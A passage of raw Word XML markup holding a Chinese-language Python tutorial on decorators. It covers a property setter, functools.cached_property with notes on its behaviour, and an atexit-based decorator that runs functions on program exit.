        <w:t>...     def count(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158E9512" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>...         return self.field1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F99AA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">...     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">@count.setter                           # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>添加设置写操作函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AE943F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>...     def count(self, value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F79E25F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>...         if not isinstance(value, int):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE13CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>...             raise ValueError('count must be an integer!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457A8FA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>...         self.field1 = value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E55D33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">...                                            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类定义结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F35201B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; obj1 = GetterSetter()                      # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741D7696" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; obj1.count = 3                             # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B3CF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; obj1.count                                 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3EE643" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04146EF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF185F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有个装饰器叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@cached_property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AC5FB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://docs.python.org/zh-tw/3/library/functools.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DFEDC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class DataSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB1DB63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self, sequence_of_numbers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483A349D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self._data = tuple(sequence_of_numbers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C014818" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    @cached_property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5837B17C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def stdev(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA0CA1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return statistics.stdev(self._data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1276EC91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="775E4054" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cached_property() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的设定与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> property() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有所不同。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常规的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> property </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会阻止属性写入，除非定义了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> setter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与之相反，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cached_property </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则允许写入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6C58E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cached_property </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰器仅在执行查找且不存在同名属性时才会运行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当运行时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cached_property </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会写入同名的属性。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后续的属性读取和写入操作会优先于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cached_property </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，其行为就像普通的属性一样。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B65E048" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存的值可通过删除该属性来清空。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cached_property </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法再次运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5A0233" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，这个装饰器会影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> PEP 412 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键共享字典的操作。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这意味着相应的字典实例可能占用比通常时更多的空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E132269" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而且，这个装饰器要求每个实例上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __dict__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是可变的映射。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这意味着它将不适用于某些类型，例如元类（因为类型实例上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __dict__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性是类命名空间的只读代理），以及那些指定了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __slots__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但未包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __dict__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为所定义的空位之一的类（因为这样的类根本没有提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __dict__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1C05B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果可变的映射不可用或者如果想要节省空间的键共享，可以通过在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cache() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之上堆叠一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> property() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cached_property() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的效果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311402CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67BBD9E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class DataSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA31037" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self, sequence_of_numbers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1E8A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        self._data = sequence_of_numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236D389" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    @property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E278E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    @cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032044F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def stdev(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08015035" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return statistics.stdev(self._data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356EAA65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718BA471" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15308A13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022DBAAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5EFBB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EAEA1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7423E3C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>退出时执行的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE523B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34977A0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来介绍的装饰器用来装饰在程序退出时执行的函数。演示例子如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3231E70A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F794BD1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">def onexit(f):                            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5E5AF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    import atexit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD42E29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    atexit.register(f)                    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将被装饰函数注册到系统中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFBCDD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1456A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@onexit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294CD1DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def on_exit_func1():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031B9734" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("on_exit_func1() is running")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548454CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@onexit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B5E4B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def on_exit_func2():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2413F95A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("on_exit_func2() is running")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D51C671" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print("Starting running")                  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
